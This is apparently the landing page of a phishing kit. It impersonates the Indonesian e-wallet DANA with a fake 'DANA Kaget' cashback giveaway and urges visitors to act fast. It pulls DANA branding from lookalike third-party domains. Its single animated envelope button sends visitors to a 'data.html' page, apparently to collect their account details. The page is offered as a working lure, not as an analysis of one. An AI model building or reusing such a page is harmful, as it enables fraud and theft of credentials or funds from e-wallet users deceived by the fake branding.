
<!DOCTYPE html>
<html>
    <head>
        <title>DANA Kaget buatmu</title>
        <meta data-n-head="ssr" data-hid="og:image" property="og:image" content="https://i.pinimg.com/736x/46/6c/1b/466c1bd2d44437335d4f0718625a8fe8.jpg
            <meta charset="UTF-8">
        <meta name="description" content="DANA Kaget Cuma buat kamu yang paling gesit! Sikat sekarang!">
        <meta name="keywords" content="dana, danakaget, receh, uang">
        <link rel="icon" type="image/x-icon" href="https://i.pinimg.com/736x/46/6c/1b/466c1bd2d44437335d4f0718625a8fe8.jpg">
        <link rel="apple-touch-icon" sizes="180x180" href="https://i.pinimg.com/736x/46/6c/1b/466c1bd2d44437335d4f0718625a8fe8.jpg">
        <link rel="icon" type="image/png" sizes="32x32" href="https://klaim-dagetld.pictte.com/assets/img/favicon/favicon-32x32.png">
        <link rel="icon" type="image/png" sizes="16x16" href="https://klaim-dagetld.pictte.com/assets/img/favicon/favicon-16x16.png">
        <link rel="manifest" href="https://klaim-dagetld.pictte.com/assets/img/favicon/site.webmanifest">
        <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
        <link rel="stylesheet" type="text/css" href="/kaget.css">
        <style>
            .amplop {
                animation: pulse 2s infinite;
            }

            @keyframes pulse {
                0% {
                    transform: scale(1);
                }
                50% {
                    transform: scale(1.2);
                }
                100% {
                    transform: scale(1);
                }
            }
        </style>
    </head>
    <body>
        <div class="dana_index">
            <div class="head">
                <h2 class="dana_logo2"></h2>
            </div>
            <div class="dana_logo"></div>
            <h1 class="part=""> 𝗕𝗼𝗻𝘂𝘀 𝗧𝗼𝗽 𝗨𝗽 𝗖𝗵𝗮𝘀𝗯𝗮𝗰𝗸 𝗦𝗮𝗹</h1>
            <button onclick="window.location.href='..//data.html'">
                <img class="amplop" src="event.png">
            </button>
        </div>
        <style>
            .dana_logo {
                width: 90px;
                height: 90px;
                background: url("https://danadompetdigital1.fres-ae.top/assets/img/dana-logo.fe46647.png") no-repeat center center / contain;
            }

            .dana_logo2 {
                width: 100px;
                height: 100px;
                background: url("https://danadompetdigital1.fres-ae.top/assets/img/dana-logo.fe46647.png") no-repeat center center / contain;
            }
        </style>
    </body>
</html>
